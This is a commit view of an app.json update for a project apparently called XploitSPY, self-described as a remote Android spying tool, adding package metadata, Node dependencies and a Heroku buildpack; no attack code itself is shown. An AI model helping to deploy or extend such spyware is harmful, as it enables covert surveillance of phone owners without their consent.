Update app.json

This commit is contained in:
MAHESH KUMAR 2020-04-22 17:21:05 +05:30 committed by GitHub
parent 785761f69c
commit 8e0954c7e5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,4 +1,23 @@
{
"name": "xploitspy",
"version": "1.0.0",
"description": "XploitSPY - Remote Android Spying Tool",
"main": "index.js",
"scripts": {
"start": "node index.js",
"test": "node index.js"},
"author": "XploitWizer",
"license": "ISC",
"dependencies": {
"body-parser": "^1.19.0",
"cookie-parser": "^1.4.4",
"ejs": "^2.6.2",
"express": "^4.17.1",
"geoip-lite": "^1.3.7",
"lowdb": "^1.0.0",
"socket.io": "^2.2.0"
},
"buildpacks": [
{
"url": "heroku/jvm"